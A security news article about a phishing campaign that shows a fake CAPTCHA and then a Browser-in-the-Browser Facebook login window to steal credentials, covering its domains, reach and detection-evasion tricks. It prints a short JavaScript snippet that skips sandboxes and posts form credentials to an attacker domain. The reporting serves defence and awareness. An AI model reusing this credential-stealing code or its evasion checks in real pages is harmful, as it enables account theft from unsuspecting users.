New Phishing Attack Mimics Facebook Login Page to Steal Credentials

A rapidly evolving campaign is using a Browser-in-the-Browser (BitB) overlay to impersonate Facebook’s login and siphon user credentials.

The lure hinges on a deceptive CAPTCHA challenge that seamlessly morphs into a counterfeit Facebook session window, duping victims across desktops and mobile browsers alike.

The malware surfaced on 24 July 2025 when multiple redirection chains began populating social-media ads and compromised WordPress sites with a fake “Are you human?” prompt that routes through domains such as recaptcha-metahorizon[․]com and facefbook[․]com.

Google News

FB Phishing Alert
Fake captcha -> Browser-in-the-Browser trick

Users are being targeted by a novel @Facebook #phishing. Following a malicious redirect, the website displays a #FakeCaptcha prompt. Once clicked, a Browser-in-the-Browser Facebook login window comes up,… pic.twitter.com/nWwzlFUrCD

— Gen Threat Labs (@GenThreatLabs) July 24, 2025

Once the user interacts, a perfectly skinned BitB window launches, complete with legitimate Facebook SSL indicators and an address bar snapshot captured via CSS to foster trust.

New Phishing Attack Mimics Facebook Login Page to Steal Credentials — Fake Facebook Login Page (Source – X)

Gen Threat Labs analysts noted that the HTML automatically harvests username and password values through an injected onsubmit event, posting the credentials to an attacker-controlled API before refreshing the real facebook․com page to mask the breach.

Their telemetry already traces 500,000 exposure attempts across North America and Southeast Asia, underscoring the operation’s global reach.

Unlike earlier BitB efforts, this variant leverages cloud-hosted edge functions to rotate infrastructure hourly, frustrating block-lists and extending the dwell time of malicious hosts.

Enterprises report secondary account takeovers and business-page hijacking that fuels payroll-diversion scams and ad-credit theft, amplifying the blast radius well beyond personal profiles.

Detection Evasion

The malware’s evasion strategy centers on dynamic JavaScript that weaponizes the window.opener property, obliterating traditional origin checks before endpoint security tools can inspect the Document Object Model.

When embedded inside the spoofed iframe, the script also crawls for anti-bot artifacts—such as webdriver flags or sandboxed extensions—and aborts execution on detection, ensuring analysts receive a benign CAPTCHA loop.

if(!navigator.webdriver && !window.chrome?.runtime){
  let creds = new FormData(document.forms[0]);
  fetch('https://loginpage-meta.com/api', {method:'POST', body:creds});
}

By limiting telemetry exports to POST requests and auto-tearing down fake domains within 60 minutes, the operators minimize network indicators and slip through signature-based web-gateways.

Experience faster, more accurate phishing detection and enhanced protection for your business with real-time sandbox analysis-> Try ANY.RUN now

Source link